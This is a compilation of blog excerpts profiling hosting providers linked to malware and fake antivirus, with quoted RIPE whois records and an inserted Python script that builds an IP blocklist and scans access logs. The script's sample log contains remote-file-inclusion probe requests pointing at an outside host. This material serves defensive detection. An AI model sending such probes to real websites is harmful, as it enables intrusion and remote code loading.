Sources of Badness – Still Trade LTD

The worst culprit I have come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Of the 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware; see their report here.

person: Perevitskiy [...]


Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C, as reported by FireEye.

inetnum: 92.62.101.0 – 92.62.101.255
netname: STARLINE_EE
descr: Starline Web Services
country: EE
admin-c: VN268-RIPE
tech-c: VN268-RIPE
status: ASSIGNED PA
mnt-by: AS39823-MNT
changed: roman@compic.ee 20080403
e-mail: info@starline.ee
abuse-mailbox: abuse@starline.ee
source: [...]


Sources of Badness – PortNAP

One of the smaller hosts I have identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We have seen fake antivirus coming from 3 of their IPs in two different /24 subnets registered to PortNAP, 84.243.196.0 – 84.243.197.255.

inetnum: 84.243.197.0 – 84.243.197.255
netname: GFX-CUST-PORTNAP
descr: PortNAP Internet Services
org: ORG-PIS13-RIPE [...]


Sources of Badness – ZlKon

After a weekend hiatus, I am back with the next host of interest: ZlKon.

role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
e-mail: hostmaster@zlkon.lv
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
changed: hostmaster@zlkon.lv 20081125
source: RIPE
abuse-mailbox: abuse@zlkon.lv

Based in Latvia, ZlKon seems to have a high [...]


Sources of Badness – UATelecom

The next source of badness I will cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run-in with this host, which you can read about here (written in German).

91.203.92.0/22 AS44997
netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: [...]
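The posts above identify each host by a RIPE inetnum range or a CIDR prefix, and the practical use of that is to turn the ranges into a blocklist and check the client addresses in your own logs against it. The script below is an added example, not code from the blog: it parses the flattened RIPE fields quoted in the Starline, PortNAP and UATelecom posts, converts inetnum ranges to CIDR networks (a RIPE range need not align to a prefix boundary, so one range can become several networks), and flags log lines whose source IP falls inside a listed block. The UATelecom block is only given as a prefix with its origin AS, so it is entered as a route object here (an assumption about formatting, not something the post shows), and the access-log lines are constructed for the demonstration.

```python
"""Blocklist matching for the netblocks named in these posts.

Added example, not code from the blog. RIPE_RECORDS holds the flattened
fields quoted in the Starline, PortNAP and UATelecom posts; the UATelecom
entry is written as a route object (assumption). SAMPLE_LOG is constructed
and uses RFC 5737 documentation addresses for the unrelated traffic.
"""
from __future__ import annotations

import ipaddress
import re

RIPE_RECORDS = [
    "inetnum: 92.62.101.0 – 92.62.101.255 netname: STARLINE_EE "
    "descr: Starline Web Services country: EE",
    "inetnum: 84.243.196.0 – 84.243.197.255 netname: GFX-CUST-PORTNAP "
    "descr: PortNAP Internet Services",
    "route: 91.203.92.0/22 origin: AS44997 netname: BASTION-NET descr: ISP UATelecom",
]

# Constructed Apache-style access log. The first two requests carry a URL in a
# query parameter (the classic remote file inclusion probe); the third is benign.
SAMPLE_LOG = """\
92.62.101.77 - - [10/Mar/2009:04:12:33 +0000] "GET /index.php?page=http://198.51.100.7/c.txt? HTTP/1.1" 200 512
84.243.197.10 - - [10/Mar/2009:04:13:01 +0000] "GET /cms/inc.php?lib=http://198.51.100.7/id.txt? HTTP/1.1" 404 0
203.0.113.5 - - [10/Mar/2009:04:14:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024
"""

# A RIPE "key: value" field; keys such as e-mail or abuse-mailbox contain a hyphen.
_FIELD = re.compile(r"(?:^|\s)([a-z][\w-]*):\s+")
# Client address at the start of a combined-format log line.
_LOG_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def parse_ripe(flat: str) -> dict[str, str]:
    """Split a RIPE record that extraction ran onto one line back into fields.

    Repeated keys (address:, descr:) keep their first value, which is all
    that range matching needs.
    """
    parts = _FIELD.split(flat.strip())  # ['', key, value, key, value, ...]
    fields: dict[str, str] = {}
    for key, value in zip(parts[1::2], parts[2::2]):
        fields.setdefault(key, value.strip())
    return fields


def networks_for(fields: dict[str, str]) -> list[ipaddress.IPv4Network]:
    """Convert an inetnum range or a route prefix into CIDR networks."""
    if "route" in fields:
        return [ipaddress.ip_network(fields["route"], strict=False)]
    # RIPE prints the range with an en dash; accept a plain hyphen as well.
    lo, hi = re.split(r"\s*[–-]\s*", fields["inetnum"])
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(lo), ipaddress.ip_address(hi)))


def build_blocklist(records: list[str]) -> list[tuple[ipaddress.IPv4Network, str]]:
    """(network, netname) pairs, most specific prefix first."""
    entries = []
    for rec in records:
        fields = parse_ripe(rec)
        for net in networks_for(fields):
            entries.append((net, fields["netname"]))
    entries.sort(key=lambda e: e[0].prefixlen, reverse=True)
    return entries


def lookup(ip: str, blocklist: list[tuple[ipaddress.IPv4Network, str]]) -> str | None:
    """Netname of the most specific listed block containing ip, else None."""
    addr = ipaddress.ip_address(ip)
    for net, name in blocklist:
        if addr in net:
            return name
    return None


def flag_log(log_text: str, blocklist: list[tuple[ipaddress.IPv4Network, str]]) -> list[tuple[str, str]]:
    """(source ip, netname) for every log line whose client sits in a listed block."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_IP.match(line)
        if not m:
            continue
        name = lookup(m.group(1), blocklist)
        if name:
            hits.append((m.group(1), name))
    return hits


if __name__ == "__main__":
    bl = build_blocklist(RIPE_RECORDS)
    for net, name in bl:
        print(f"{str(net):20} {name}")
    for ip, name in flag_log(SAMPLE_LOG, bl):
        print(f"hit: {ip} is in {name}")
```

The range 84.243.196.0 – 84.243.197.255 collapses to a single /23 because it starts on an even third octet; a range such as 84.243.196.0 – 84.243.198.255 would come back as a /23 plus a /24, which is why the code keeps a list of networks per record rather than assuming one prefix.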


Sources of Badness – LeaseWeb

**Edit 2** I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of [...]
